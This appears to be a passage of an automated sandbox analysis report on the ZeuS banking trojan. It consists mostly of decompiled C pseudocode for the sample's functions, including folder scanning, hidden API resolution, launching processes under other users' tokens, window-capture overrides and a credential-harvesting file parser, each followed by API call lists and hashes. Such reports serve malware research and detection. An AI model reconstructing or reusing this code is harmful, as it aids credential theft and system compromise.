    • Part of subcall function 0040A91B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
    • Part of subcall function 0040A91B: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
    • Part of subcall function 0040A91B: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
    • Part of subcall function 0040A91B: Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
    • Part of subcall function 0040A91B: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
    • Part of subcall function 0040A91B: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
  • String ID: #$&
  • API String ID: 3438805939-3870246384
  • Opcode ID: 1e4f787ab8bb824a08517f25c2e885915770b9e3e9f5b9644a340dbc88cdedc9
  • Instruction ID: 75d2f66cf28c6e64b97718bc9e945e1cbc3c88ce406780d93764e2d673975ac3
  • Opcode Fuzzy Hash: 1e4f787ab8bb824a08517f25c2e885915770b9e3e9f5b9644a340dbc88cdedc9
  • Instruction Fuzzy Hash: 2B1170B1A012287ADB209B96DC09FDF7F7CEF81314F00416AF505B6180D7785B85CBA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
			E0041524B(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E0040F34A(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00405299( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040A91B( &_v580,  &_v16, _t37, 1, 2, E00414FBC,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004051E6(_v12);
				}
				return E0041293E(_t29, _v12, 0xcb);
			}

APIs
  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0041529B
    • Part of subcall function 0040A91B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
    • Part of subcall function 0040A91B: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
    • Part of subcall function 0040A91B: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
    • Part of subcall function 0040A91B: Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
    • Part of subcall function 0040A91B: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
    • Part of subcall function 0040A91B: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
  • String ID: #$&
  • API String ID: 3438805939-3870246384
  • Opcode ID: 2f6e1e2129976daefbbc4e70f6e9333ca7324040863bd3caddfeb8f4eafd63f5
  • Instruction ID: 57393e65a262e405af10fd59cdcc93fa0be1ca7707a824fd6471059d0c6d1627
  • Opcode Fuzzy Hash: 2f6e1e2129976daefbbc4e70f6e9333ca7324040863bd3caddfeb8f4eafd63f5
  • Instruction Fuzzy Hash: 0F117076A01118BBDB209B96DC49FDFBF78EF81714F00406AF605B6180D3785B85CBA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
			E0041CF7B(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E0040F34A(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E0040F314(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E0040F34A(0xd5,  &_v92);
					_push(0x1e6);
					_push("0xF52BE0F5");
					if(E00405F54( &_v8, _t32, 0x2000809) > 0) {
						 *_t28(0, _v8, E00404BB0, 0x10040);
						E004051E6(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

APIs
  • GetModuleHandleW.KERNEL32(?), ref: 0041CF92
  • GetProcAddress.KERNEL32(00000000,?), ref: 0041CFB4
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressHandleModuleProc
  • String ID: 0xF52BE0F5
  • API String ID: 1646373207-3323659948
  • Opcode ID: e1c50757277fa203787e9e278e1edd06f2cf3a0e613258fd7d3f2481e2aec14f
  • Instruction ID: 5e487ba10198d4c49d809f9eb81f5b8d2071b52fedbe5d24876568ebb921d83f
  • Opcode Fuzzy Hash: e1c50757277fa203787e9e278e1edd06f2cf3a0e613258fd7d3f2481e2aec14f
  • Instruction Fuzzy Hash: 8601F976A4025077DF206AA59C06BDF3B78DB88714F000072FE01F72C1DA7CEE0695A8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
			E0041CC9C(void* __ecx, WCHAR* __edi, void* __esi, signed int _a4) {
				char _v104;
				char _v154;
				char _v174;
				char _v194;
				char _v592;
				signed int _t13;
				int _t15;
				WCHAR* _t18;
				char* _t21;
				WCHAR* _t22;
				void* _t23;

				_t23 = __esi;
				_t22 = __edi;
				 *__edi = 0;
				E0041CC4A(__ecx,  &_v592);
				_t13 = _a4;
				if(_t13 == 0) {
					L6:
					_t21 =  &_v174;
					goto L7;
				} else {
					_t13 = _t13 - 1;
					if(_t13 == 0) {
						_t21 =  &_v194;
						L7:
						_t18 = 0x423a10;
						goto L8;
					} else {
						_t13 = _t13 - 1;
						if(_t13 == 0) {
							goto L6;
						} else {
							_t15 = _t13 - 1;
							if(_t15 == 0) {
								_t18 = L"SOFTWARE\\Microsoft";
								_t21 =  &_v154;
								L8:
								_push(_t23);
								_t15 = E004053F1(_t13 | 0xffffffff, _t21,  &_v104, 0, 0x32);
								if(_t15 != 0) {
									_t15 = E0040AA77( &_v104, _t22, _t18);
									if(_t15 == 0) {
										L12:
										_t15 = 0;
										 *_t22 = 0;
									} else {
										if(_a4 == 0) {
											_t15 = PathRenameExtensionW(_t22, L".dat");
											if(_t15 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t15;
			}

APIs
  • PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: ExtensionPathRename
  • String ID: .dat$SOFTWARE\Microsoft
  • API String ID: 3337224433-47915998
  • Opcode ID: 959c06ef34028d00c16f7444816818665c862f816e947b98c22ce699c3b874dd
  • Instruction ID: 6c8aab1e06ea9ca908a7e166dfaf49000adbd0f1c6ea6aca4052e4c55400e514
  • Opcode Fuzzy Hash: 959c06ef34028d00c16f7444816818665c862f816e947b98c22ce699c3b874dd
  • Instruction Fuzzy Hash: 8C01963069030996DB20DB68DCC1BEB37A8EB11394F104037E409F61C1E73C9E82C69D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
			E0040A569(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E0040651F());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E00405ED9(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0040AA77(_t19, _a8,  &_v524) == 0 || E0040A39D(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

APIs
  • GetTempPathW.KERNEL32(000000F6,?), ref: 0040A580
    • Part of subcall function 0040651F: GetTickCount.KERNEL32 ref: 0040651F
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
    • Part of subcall function 0040A39D: CreateFileW.KERNEL32(00406CC0,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3B7
    • Part of subcall function 0040A39D: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3DA
    • Part of subcall function 0040A39D: CloseHandle.KERNEL32(00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3E7
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
  • String ID: %s%08x.%s$tmp
  • API String ID: 3395140874-234517578
  • Opcode ID: 661b2a8b8ca0fc6cc245dd7901bf68b3eea6e28c20f9fc2e77374e8eb8893d3a
  • Instruction ID: 080e7e9b51f920111718eb95920d5d5a073a3d979218899ddd6f8df9b04652d0
  • Opcode Fuzzy Hash: 661b2a8b8ca0fc6cc245dd7901bf68b3eea6e28c20f9fc2e77374e8eb8893d3a
  • Instruction Fuzzy Hash: 40017D3120031436DF20BA20DC06BEF7718EB01768F104133FD25BA1E2C2798EA6869E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00408DBA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0040A548( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00405365(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E00405222(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

APIs
  • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00408DDC
    • Part of subcall function 0040A548: SetFileAttributesW.KERNEL32(00000080,00000080,0040F748,?), ref: 0040A551
    • Part of subcall function 0040A548: DeleteFileW.KERNEL32(?), ref: 0040A55B
  • PathFindFileNameW.SHLWAPI(?,?,?), ref: 00408DFE
    • Part of subcall function 00405365: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040605D,00000000,00000000,00000000,004053C2,00000000,00000000,00000000,?,00000000), ref: 00405380
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
  • String ID: cab
  • API String ID: 2491076439-1787492089
  • Opcode ID: 498181ec137a2167c1af2ebe2f9c1b86589f91e84d53eb2209bac8434ed75fec
  • Instruction ID: bbd98da86b9023202aea280e640d21bb16665ebd0969d1a8156627a174fcde3d
  • Opcode Fuzzy Hash: 498181ec137a2167c1af2ebe2f9c1b86589f91e84d53eb2209bac8434ed75fec
  • Instruction Fuzzy Hash: B201A73660031467CB10AA78DC4EF8777ACAF04755F004265B969F31D1DA78E9048A94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			E0040C077(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E004088D5(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00405F54( &_a4, L"\"%s\"", _a16) > 0) {
								E00406B08(_t27, _a4);
								E004051E6(_a4);
							}
						}
						E004051E6(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

APIs
    • Part of subcall function 004088D5: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,0040681F,00000001,?,?,0041C79F,000000FF,004239C0), ref: 004088EE
    • Part of subcall function 004088D5: GetLastError.KERNEL32(?,?,0040681F,00000001,?,?,0041C79F,000000FF,004239C0), ref: 004088F4
    • Part of subcall function 004088D5: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0040681F,00000001,?,?,0041C79F,000000FF,004239C0), ref: 0040891A
  • EqualSid.ADVAPI32(00000000,0040C1F0,?,0040C1F0,?,?,00000000), ref: 0040C09C
    • Part of subcall function 00406B08: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00406B19
    • Part of subcall function 00406B08: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00406B38
    • Part of subcall function 00406B08: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00406B44
    • Part of subcall function 00406B08: CreateProcessAsUserW.ADVAPI32(?,00000000,0040C0CB,00000000,00000000,00000000,0040C0CB,0040C0CB,00000000,?,?,?,00000000,00000044), ref: 00406BB5
    • Part of subcall function 00406B08: CloseHandle.KERNEL32(?), ref: 00406BC8
    • Part of subcall function 00406B08: CloseHandle.KERNEL32(?), ref: 00406BCD
    • Part of subcall function 00406B08: FreeLibrary.KERNEL32(?), ref: 00406BE4
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • CloseHandle.KERNEL32(?,?,0040C1F0,?,?,00000000), ref: 0040C0DD
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
  • String ID: "%s"
  • API String ID: 4035272744-3297466227
  • Opcode ID: d81098550d816526a83a5eeb3323a7e5280b189ee3efe8292ae97e88d75798e7
  • Instruction ID: 5f0b570150c15766f1ad5c2685fb700982de5592406f2952f451c2c7d3ec752a
  • Opcode Fuzzy Hash: d81098550d816526a83a5eeb3323a7e5280b189ee3efe8292ae97e88d75798e7
  • Instruction Fuzzy Hash: E1F0FB32500109FBCF116FA1EC45E9F3F6AEF44354B048136BD09B91A1DB39DA60EB58
Uniqueness

Uniqueness Score: -1.00%

APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • GetCurrentThreadId.KERNEL32 ref: 0040F159
  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040F163
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Thread$CurrentObjectProcessSingleWaitWindow
  • String ID: 82B
  • API String ID: 419583955-2694519287
  • Opcode ID: 74c869487249245d1ba1056a90bb747a331391252844493eebdf09c22e27878f
  • Instruction ID: b75270d975fbd47235fa7c85e0a14fd1a77e46c7eaa87290c9d2976d102ccb3e
  • Opcode Fuzzy Hash: 74c869487249245d1ba1056a90bb747a331391252844493eebdf09c22e27878f
  • Instruction Fuzzy Hash: CEF0A733201630E6C2316ABBFC88DDB9B69DD867F53508477F20CBAA51D2384C4982F9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004072AF(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E0040722E();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E004070FC( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E004051E6(_v44);
				return _t26;
			}

APIs
    • Part of subcall function 0040722E: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040723F
    • Part of subcall function 0040722E: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00407252
    • Part of subcall function 0040722E: FreeLibrary.KERNEL32(?), ref: 004072A4
  • GetTickCount.KERNEL32 ref: 004072F4
    • Part of subcall function 004070FC: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00407150
    • Part of subcall function 004070FC: InternetCloseHandle.WININET(00000000), ref: 004071E9
  • GetTickCount.KERNEL32 ref: 00407306
Strings
  • http://www.google.com/webhp, xrefs: 004072D4
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
  • String ID: http://www.google.com/webhp
  • API String ID: 2673491915-2670330958
  • Opcode ID: b15b2d826bd8b4cf6d748a82818e30600fff39aea3dbba0ae6b248fdd392da7c
  • Instruction ID: 3d8d7f1564369bc37c0409ce0b2ea30e479f038e55c8597adf02c196dd255389
  • Opcode Fuzzy Hash: b15b2d826bd8b4cf6d748a82818e30600fff39aea3dbba0ae6b248fdd392da7c
  • Instruction Fuzzy Hash: FF01D6B1D11228AACF00DFE9E9455DEFBB8AF08748F10416BE900B7254D3B45A058FE9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040F1D0(void* __eax) {
				void* __ebx;
				long _t8;
				intOrPtr _t16;
				struct HWND__* _t19;

				if(__eax + 0x423a06 == 0 || E0041CAA4() == 0) {
					return GetCapture();
				}
				_t8 = GetCurrentThreadId();
				_t16 =  *0x423248;
				if( *((intOrPtr*)(_t16 + 0x10c)) != _t8) {
					L6:
					return 0;
				} else {
					_t19 =  *(_t16 + 0x108);
					if(_t19 == 0 || IsWindow(_t19) != 0) {
						return _t19;
					} else {
						E0040E862(0, 0x423238, _t11, _t11, _t11);
						goto L6;
					}
				}
			}

APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • GetCurrentThreadId.KERNEL32 ref: 0040F1E2
  • IsWindow.USER32(?), ref: 0040F201
    • Part of subcall function 0040E862: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
    • Part of subcall function 0040E862: ReleaseMutex.KERNEL32(?), ref: 0040E89C
    • Part of subcall function 0040E862: IsWindow.USER32(?), ref: 0040E8A3
    • Part of subcall function 0040E862: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: ObjectSingleWaitWindow$CurrentMessageMutexPostReleaseThread
  • String ID: 82B
  • API String ID: 904989000-2694519287
  • Opcode ID: 89b7b07eba3e213a853107aa0b81bd94ddfede516d858cec04a4b2637724af59
  • Instruction ID: e2cfca34dec983628dce6c367dbe96c77e3d655ba249be4a733720ff305035e4
  • Opcode Fuzzy Hash: 89b7b07eba3e213a853107aa0b81bd94ddfede516d858cec04a4b2637724af59
  • Instruction Fuzzy Hash: F1F0A736600020ABC760EFA57C446EA6359DB0570570944FFE804F7661D33A4C8645AC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040F180(void* __eax, void* __ecx) {
				void* __ebx;
				void* __esi;

				if(E0041CAA4() == 0) {
					return ReleaseCapture();
				}
				if( *((intOrPtr*)( *0x423248 + 0x10c)) != GetCurrentThreadId()) {
					SetLastError(5);
					return 0;
				} else {
					E0040E862(0, 0x423238, 0, 0, 0);
					return 1;
				}
			}

APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • GetCurrentThreadId.KERNEL32 ref: 0040F191
  • SetLastError.KERNEL32(00000005), ref: 0040F1C0
    • Part of subcall function 0040E862: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
    • Part of subcall function 0040E862: ReleaseMutex.KERNEL32(?), ref: 0040E89C
    • Part of subcall function 0040E862: IsWindow.USER32(?), ref: 0040E8A3
    • Part of subcall function 0040E862: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: ObjectSingleWait$CurrentErrorLastMessageMutexPostReleaseThreadWindow
  • String ID: 82B
  • API String ID: 2244431463-2694519287
  • Opcode ID: 741a29d290f118c0105207ee80034e95639e7727668a51d0193c9c0fbd98b527
  • Instruction ID: 7a585e3e00d8bdd23cf52b68934e73bb5f0fb3b8a94c514dd06c01f402a0b9e1
  • Opcode Fuzzy Hash: 741a29d290f118c0105207ee80034e95639e7727668a51d0193c9c0fbd98b527
  • Instruction Fuzzy Hash: 14E0D871210100EFD710AFB1AD406A32369EB45306B5444BAF945EA161D7398C454968
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E00414FBC(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E0040AA77( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E0040A402(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E00405A81(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0040A4AA( &_v612);
						goto L31;
					}
					_v640 = E004051B6(0x622);
					E0040F314(0x91,  &_v588);
					E0040F314(0x92,  &_v628);
					E0040F314(0x93,  &_v620);
					E0040F314(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E004051E6(_v640);
						E00405202(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E00414FA2();
							E00414FA2();
							E00414FA2();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
